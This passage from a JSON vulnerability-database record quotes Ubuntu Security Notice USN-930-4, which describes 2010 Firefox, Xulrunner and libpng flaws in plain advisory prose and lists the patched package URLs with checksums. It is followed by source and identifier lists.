mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. ===========================================================\nUbuntu Security Notice USN-930-4 July 23, 2010\nfirefox-3.0, firefox-3.5, xulrunner-1.9.2 vulnerabilities\nCVE-2008-5913, CVE-2010-0654, CVE-2010-1121, CVE-2010-1125,\nCVE-2010-1196, CVE-2010-1197, CVE-2010-1198, CVE-2010-1199,\nCVE-2010-1200, CVE-2010-1201, CVE-2010-1202, CVE-2010-1203,\nCVE-2010-1205, CVE-2010-1206, CVE-2010-1207, CVE-2010-1208,\nCVE-2010-1209, CVE-2010-1210, CVE-2010-1211, CVE-2010-1212,\nCVE-2010-1213, CVE-2010-1214, CVE-2010-1215, CVE-2010-2751,\nCVE-2010-2752, CVE-2010-2753, CVE-2010-2754\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 9.04:\n abrowser 3.6.7+build2+nobinonly-0ubuntu0.9.04.1\n firefox-3.0 3.6.7+build2+nobinonly-0ubuntu0.9.04.1\n xulrunner-1.9.2 1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2\n\nUbuntu 9.10:\n firefox-3.5 3.6.7+build2+nobinonly-0ubuntu0.9.10.1\n xulrunner-1.9.2 1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2\n\nMozilla has changed the support model for Firefox and they no longer\nsupport version 3.0 of the browser and will only support version 3.5 of the\nbrowser for a while longer. As a result, Ubuntu is providing an upgrade to\nFirefox 3.6 for Ubuntu 9.04 and 9.10 users, which is the most current\nstable release of Firefox supported by Mozilla. When upgrading, users\nshould be aware of the following:\n\n- Firefox 3.6 does not support version 5 of the Sun Java plugin. Please use\n icedtea6-plugin or sun-java6-plugin instead. \n- After upgrading to Firefox 3.6.6, users may be prompted to upgrade 3rd\n party Add-Ons. In some cases, an Add-On will not be compatible with\n Firefox 3.6.6 and have no update available. In these cases, Firefox will\n notify the user that it is disabling the Add-On. \n- Font configuration cannot be controlled via Gnome settings. This is a\n known issue being tracked in https://launchpad.net/bugs/559149 and will\n be fixed in a later update. \n- helix-player is not currently supported in Firefox 3.6. This is a known\n issue and may be fixed in a future update. \n- Plugins using external helpers (such as Totem) may not close when using\n the Epiphany browser. This is a known issue being tracked in\n https://launchpad.net/bugs/599796 and will be fixed in a later update. \n This issue only affects Ubuntu 9.04. \n- The OpenJDK java plugin is not available in Ubuntu 9.04 on Sparc\n hardware. This will be fixed in a future update. \n\nAfter a standard system upgrade you need to restart Firefox and any\napplications that use Xulrunner to effect the necessary changes. \n\nDetails follow:\n\nUSN-930-1 fixed vulnerabilities in Firefox and Xulrunner. This update\nprovides the corresponding updates for Ubuntu 9.04 and 9.10, along with\nadditional updates affecting Firefox 3.6.6. \n\nSeveral flaws were discovered in the browser engine of Firefox. If a user\nwere tricked into viewing a malicious site, a remote attacker could use\nthis to crash the browser or possibly run arbitrary code as the user\ninvoking the program. (CVE-2010-1208, CVE-2010-1209, CVE-2010-1211,\nCVE-2010-1212)\n\nAn integer overflow was discovered in how Firefox processed plugin\nparameters. An attacker could exploit this to crash the browser or possibly\nrun arbitrary code as the user invoking the program. (CVE-2010-1214)\n\nA flaw was discovered in the Firefox JavaScript engine. If a user were\ntricked into viewing a malicious site, a remote attacker code execute\narbitrary JavaScript with chrome privileges. (CVE-2010-1215)\n\nAn integer overflow was discovered in how Firefox processed CSS values. An\nattacker could exploit this to crash the browser or possibly run arbitrary\ncode as the user invoking the program. (CVE-2010-2752)\n\nAn integer overflow was discovered in how Firefox interpreted the XUL\n\u003ctree\u003e element. If a user were tricked into viewing a malicious site, a\nremote attacker could use this to crash the browser or possibly run\narbitrary code as the user invoking the program. (CVE-2010-2753)\n\nAki Helin discovered that libpng did not properly handle certain malformed\nPNG images. If a user were tricked into opening a crafted PNG file, an\nattacker could cause a denial of service or possibly execute arbitrary code\nwith the privileges of the user invoking the program. (CVE-2010-1205)\n\nYosuke Hasegawa and Vladimir Vukicevic discovered that the same-origin\ncheck in Firefox could be bypassed by utilizing the importScripts Web\nWorker method. If a user were tricked into viewing a malicious website, an\nattacker could exploit this to read data from other domains. \n(CVE-2010-1213, CVE-2010-1207)\n\nO. Andersen that Firefox did not properly map undefined positions within\ncertain 8 bit encodings. An attacker could utilize this to perform\ncross-site scripting attacks. (CVE-2010-1210)\n\nMichal Zalewski discovered flaws in how Firefox processed the HTTP 204 (no\ncontent) code. An attacker could exploit this to spoof the location bar,\nsuch as in a phishing attack. (CVE-2010-1206)\n\nJordi Chancel discovered that Firefox did not properly handle when a server\nresponds to an HTTPS request with plaintext and then processes JavaScript\nhistory events. An attacker could exploit this to spoof the location bar,\nsuch as in a phishing attack. (CVE-2010-2751)\n\nChris Evans discovered that Firefox did not properly process improper CSS\nselectors. If a user were tricked into viewing a malicious website, an\nattacker could exploit this to read data from other domains. \n(CVE-2010-0654)\n\nSoroush Dalili discovered that Firefox did not properly handle script error\noutput. An attacker could use this to access URL parameters from other\ndomains. (CVE-2010-2754)\n\nOriginal advisory details:\n\n If was discovered that Firefox could be made to access freed memory. If a\n user were tricked into viewing a malicious site, a remote attacker could\n cause a denial of service or possibly execute arbitrary code with the\n privileges of the user invoking the program. (CVE-2010-1121)\n \n Several flaws were discovered in the browser engine of Firefox. If a\n user were tricked into viewing a malicious site, a remote attacker could\n cause a denial of service or possibly execute arbitrary code with the\n privileges of the user invoking the program. (CVE-2010-1200, CVE-2010-1201,\n CVE-2010-1202, CVE-2010-1203)\n \n A flaw was discovered in the way plugin instances interacted. An attacker\n could potentially exploit this and use one plugin to access freed memory from a\n second plugin to execute arbitrary code with the privileges of the user\n invoking the program. (CVE-2010-1198)\n \n An integer overflow was discovered in Firefox. If a user were tricked into\n viewing a malicious site, an attacker could overflow a buffer and cause a\n denial of service or possibly execute arbitrary code with the privileges of\n the user invoking the program. (CVE-2010-1196)\n \n Martin Barbella discovered an integer overflow in an XSLT node sorting\n routine. An attacker could exploit this to overflow a buffer and cause a\n denial of service or possibly execute arbitrary code with the privileges of\n the user invoking the program. (CVE-2010-1199)\n \n Michal Zalewski discovered that the focus behavior of Firefox could be\n subverted. If a user were tricked into viewing a malicious site, a remote\n attacker could use this to capture keystrokes. (CVE-2010-1125)\n \n Ilja van Sprundel discovered that the \u0027Content-Disposition: attachment\u0027\n HTTP header was ignored when \u0027Content-Type: multipart\u0027 was also present. \n Under certain circumstances, this could potentially lead to cross-site\n scripting attacks. (CVE-2010-1197)\n \n Amit Klein discovered that Firefox did not seed its random number generator\n often enough. An attacker could exploit this to identify and track users\n across different web sites. (CVE-2008-5913)\n\n\nUpdated packages for Ubuntu 9.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 67119 0d7f276c870914e97be8016c470c0acc\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1.diff.gz\n Size/MD5: 144826 b71440bbda1a9a19aa3434ad6a00c486\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1.dsc\n Size/MD5: 2552 0e63965d7e1ba8d0c024793dae18a651\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly.orig.tar.gz\n Size/MD5: 49883446 e3bdceebdf5bcc94f0f901ce8744a6df\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72226 e41f4ba0e1ee2812d09f178ce649be97\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72392 fb339d706ee66252e70e96d62c33b305\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72228 d3b045b5cafba2c50b75eb3c5c0a590a\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72218 6a5c7d950490e1b8265bac1bc15abeb1\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72240 e1de71fa375ab4896e29dafcca783dba\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72574 f4cb1ee7572ed2ab316313ecbb3ed84f\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72236 2dece76f652e27494e7487f4e68f646a\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72222 c4aebcd1ce9c8b621b7297b7088d2ef4\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72256 3caf1296c3c06121157b6614170e1083\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72226 d1f70077a0e3ed2fee170c02bfb03e7c\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72212 133df734e76a4477af91dec984aa2694\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72240 6efcfef2ed5164204686ce075d23332d\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb\n Size/MD5: 72210 07339b8304124d7afbacf53943f0500f\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 7798876 759f27c1d6635a6d04b07c9a73f54f3c\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 72330 b9692de7b7947e32c1f678a9d554effa\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 72764 706e5682afbbc54334bb823fe92e9d0c\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 12504700 0c81c0201b8a6b3aef72d2213d9d38b2\n http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_amd64.deb\n Size/MD5: 29308 4174c5e062a927f5f4fd445bc3f2b7ce\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 9913748 ad706c2a0c670ea9bc6de7109211c8e4\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 72340 b19f20096548fc8981367cd9d431379f\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 72762 faaacee4aa7e2fd7fa961a88c4b86d0f\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 11192572 5adae55773b0ca8e438c7252046f705b\n http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_i386.deb\n Size/MD5: 29308 ca6a787a65220583746b55366ae9ac44\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/\n Size/MD5: 4830218 0d3caf5b20aba2975f9f7e423c6b3b69\n http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 72332 099275f779e538dc54e913593084b7bc\n http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 72762 ee7361261892014edfc1a69365672c17\n http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 10687418 2a010333c02ed1112cbef0544cf73cf1\n http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_lpia.deb\n Size/MD5: 29308 5fb3d21190e1e8012b08b694c4b9239c\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/\n Size/MD5: 4812772 94b728d013dee6371b8cc4ebef11430c\n http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 72340 6318359d26cfa32d4e1eeda6c8916aa4\n http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 72770 e5449bcbe442fa1385d7b2ecbc8c1831\n http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 11583662 a73467d63e46af2f21b2e46fa0f29797\n http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_powerpc.deb\n Size/MD5: 29310 69a2c47902bb366a50c2bb3fa9053131\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/\n Size/MD5: 75512 a49a96a5d589e39a77720fe70706da03\n http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_sparc.deb\n Size/MD5: 29312 e66a94b78d1d6476b05736a82c4ed49c\n\nUpdated packages for Ubuntu 9.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 2621 74297592edce6f55313193967daaebeb\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1.diff.gz\n Size/MD5: 155727 0e58cb5f9e5293c40564e944e50437a6\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1.dsc\n Size/MD5: 2758 e6647365f000313a96f9a72b4dc8022f\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly.orig.tar.gz\n Size/MD5: 49883446 e3bdceebdf5bcc94f0f901ce8744a6df\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 29714 b4ee604ee0d4dbdc448a74f6f746528c\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75716 8ec52b07f2b60dbb381909a6b7e5f039\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75964 69b4baf1c2b4ce75ced092dbdb44266b\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75700 22bd34473ba1abe7501b247f7d8980b5\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75702 3dc765e62e9300dd5a57d512be2e3c3b\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75700 1ae9b7c023259e8f9fa994c24efeb07f\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75706 f4a1b34f657927ca5eaf15cf9976e336\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-dbg_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75704 80434fb6b98bd5ddafbd0d9d472b9416\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75698 1e6cffa413775771f086d3238ed84a6b\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75722 b3dea417d76e06235b1f7c267d4871fe\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 76052 9c59d599f01a4af2337515c224164b11\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75718 70e6d5d57e356e78500d8558e6ec7f72\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 8938 3085a96f8f815fbb01b21dd67d4b423d\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.1-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75710 45b7c94ece697097b83adb8bc09b5769\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.1_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 8940 8d60975aeb324b31426a64d0a1485320\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 8930 e9c41de371986cf16137aa0a8baa1635\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75710 191d51d184569650814b7d1e87e808a3\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75720 f18da780b4b8e57685667bb94faeac19\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75726 6bef8a651c1763ca5fdd3140bd7ae915\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-venkman_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75714 408c0fa73ac828fa9acae2a7ff02e6f7\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75692 3c4f3ef8332997b0a72bda0e436ab0fe\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75708 c3f238accf868508d1d44a3984a0deda\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75722 41bf0606552717a9988db2bd929b3862\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75692 e27ae8b4a4875eff55fedd2c3da9499e\n http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb\n Size/MD5: 75710 49ada82e615b86ac74f5880b656d8914\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 10675764 276cf6fd80197d8edf64b2c885c5e540\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_amd64.deb\n Size/MD5: 76196 ec574586607cd1da65dd5ee7c1f17317\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_amd64.deb\n Size/MD5: 12502768 ef8749c8ba4b15a29631f69baccf6984\n http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_amd64.deb\n Size/MD5: 29196 766569469e7d1d805a16b659607cb228\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/\n Size/MD5: 43286 e1e37c33ecc0918fcd518e5748c767e2\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_i386.deb\n Size/MD5: 76198 06d415ebee45883afa9de06a4bf00ba2\n http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_i386.deb\n Size/MD5: 11217372 c3ddffd8a035d3be397ffc112c17e0a9\n http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_i386.deb\n Size/MD5: 29190 c59e1bbc03df75b63c72a956530ecdff\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/\n Size/MD5: 4794796 0f04c58b1898ef6ff8c42e9f696cf943\n http://ports.ubuntu.com/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_lpia.deb\n Size/MD5: 76192 ac0e4a03520b896085dbc4b1e524c397\n http://ports.ubuntu.com/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_lpia.deb\n Size/MD5: 10720482 e9459f2ddd0b28adc40e37bc46de87d8\n http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_lpia.deb\n Size/MD5: 29194 b5c356758ef5adb4468c85577660061a\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/\n Size/MD5: 64642040 19a96c0ae2726790da3efb566ac4fdb0\n http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_powerpc.deb\n Size/MD5: 29200 69d071a75fcd766841f7f428ec9eb806\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/\n Size/MD5: 7629538 5042de0cdebf36ad17e6485b966ec94f\n http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_sparc.deb\n Size/MD5: 29194 f154cda4e06288f639db4d6024c26695\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-1205"
},
{
"db": "CERT/CC",
"id": "VU#643615"
},
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"db": "PACKETSTORM",
"id": "92059"
},
{
"db": "PACKETSTORM",
"id": "92229"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "129513"
},
{
"db": "PACKETSTORM",
"id": "92097"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "PACKETSTORM",
"id": "92111"
},
{
"db": "PACKETSTORM",
"id": "92156"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-43810",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=14422",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "VULMON",
"id": "CVE-2010-1205"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-1205",
"trust": 2.7
},
{
"db": "VUPEN",
"id": "ADV-2010-2491",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-1612",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-1837",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-1755",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-3046",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-1877",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-1637",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-3045",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-1846",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "40472",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "41574",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "42317",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "40547",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "42314",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "40302",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "40336",
"trust": 1.8
},
{
"db": "BID",
"id": "41174",
"trust": 1.8
},
{
"db": "CERT/CC",
"id": "VU#643615",
"trust": 0.9
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "48909",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "92011",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "91973",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "14422",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-69444",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91619",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-43810",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2010-1205",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "40642",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92059",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92229",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "129524",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94244",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "129513",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92097",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91878",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92111",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92156",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#643615"
},
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"db": "PACKETSTORM",
"id": "92059"
},
{
"db": "PACKETSTORM",
"id": "92229"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "129513"
},
{
